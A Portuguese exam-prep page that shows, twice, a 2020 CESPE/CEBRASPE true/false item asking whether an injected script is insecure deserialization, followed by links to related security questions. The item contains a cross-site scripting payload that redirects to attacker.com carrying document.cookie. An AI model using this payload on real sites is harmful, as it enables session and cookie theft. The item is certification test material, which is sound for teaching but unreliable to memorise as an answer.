Nesse caso, o risco de segurança da aplicação é a desserialização i...

Question 1

Nesse caso, o risco de segurança da aplicação é a desserialização i...

📅 2020🏢 CESPE / CEBRASPE🎯 Ministério da Economia📚 Segurança da Informação e Criptografia

#Segurança Física e Lógica

Esta questão foi aplicada no ano de 2020 pela banca CESPE / CEBRASPE no concurso para Ministério da Economia. A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Segurança Física e Lógica.

Esta é uma questão de múltipla escolha com 2 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941200453401

Ano: 2020Banca: CESPE / CEBRASPEOrganização: Ministério da EconomiaDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Texto associado

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.

><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

A

B

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200043702Segurança da Informação e Criptografia

Julgue o item a seguir, a respeito da Política Nacional de Segurança da Informação (PNSI), prevista no Decreto n.º 9.637/2018.Entre os objetivos previ...

#Gestão de Segurança da Informação

Questão 457941200134079Segurança da Informação e Criptografia

No que se refere a OWASP Top 10, julgue o seguinte item.Security misconfiguration indica que a aplicação pode estar vulnerável devido à utilização de ...

#Autenticação de Usuário

Questão 457941200166156Segurança da Informação e Criptografia

Acerca de criptografia, assinale a opção correta.

#Criptografia

Questão 457941200708151Segurança da Informação e Criptografia

Acerca de softwares maliciosos e antivírus, julgue o item a seguir.Vírus e worms são programas capazes de se propagar autonomamente.

#Software Malicioso

Questão 457941201431654Segurança da Informação e Criptografia

Julgue o item seguinte, com base nas normas da ABNT. As diretrizes da ABNT NBR ISO/IEC 27002:2013 incluem a segregação de funções, com objetivo de red...

#Norma ISO/IEC 27002

Questão 457941201852190Segurança da Informação e Criptografia

Julgue o seguinte item, com relação a padrões de interoperabilidade (ePING), segurança da informação e segurança da aplicação.No que se refere à segur...

#ISO/IEC 27005

Question 2

Nesse caso, o risco de segurança da aplicação é a desserialização i...

📅 2020🏢 CESPE / CEBRASPE🎯 Ministério da Economia📚 Segurança da Informação e Criptografia

#Segurança Física e Lógica

Esta questão foi aplicada no ano de 2020 pela banca CESPE / CEBRASPE no concurso para Ministério da Economia. A questão aborda conhecimentos da disciplina de Segurança da Informação e Criptografia, especificamente sobre Segurança Física e Lógica.

Esta é uma questão de múltipla escolha com 2 alternativas. Teste seus conhecimentos e selecione a resposta correta.

1

457941200453401

Ano: 2020Banca: CESPE / CEBRASPEOrganização: Ministério da EconomiaDisciplina: Segurança da Informação e CriptografiaTemas: Segurança Física e Lógica

Texto associado

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.

><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

A

B

Gabarito comentado

Anotações

Marcar para revisão

Questões relacionadas para praticar

Questão 457941200043702Segurança da Informação e Criptografia

Julgue o item a seguir, a respeito da Política Nacional de Segurança da Informação (PNSI), prevista no Decreto n.º 9.637/2018.Entre os objetivos previ...

#Gestão de Segurança da Informação

Questão 457941200134079Segurança da Informação e Criptografia

No que se refere a OWASP Top 10, julgue o seguinte item.Security misconfiguration indica que a aplicação pode estar vulnerável devido à utilização de ...

#Autenticação de Usuário

Questão 457941200166156Segurança da Informação e Criptografia

Acerca de criptografia, assinale a opção correta.

#Criptografia

Questão 457941200708151Segurança da Informação e Criptografia

Acerca de softwares maliciosos e antivírus, julgue o item a seguir.Vírus e worms são programas capazes de se propagar autonomamente.

#Software Malicioso

Questão 457941201431654Segurança da Informação e Criptografia

Julgue o item seguinte, com base nas normas da ABNT. As diretrizes da ABNT NBR ISO/IEC 27002:2013 incluem a segregação de funções, com objetivo de red...

#Norma ISO/IEC 27002

Questão 457941201852190Segurança da Informação e Criptografia

Julgue o seguinte item, com relação a padrões de interoperabilidade (ePING), segurança da informação e segurança da aplicação.No que se refere à segur...

#ISO/IEC 27005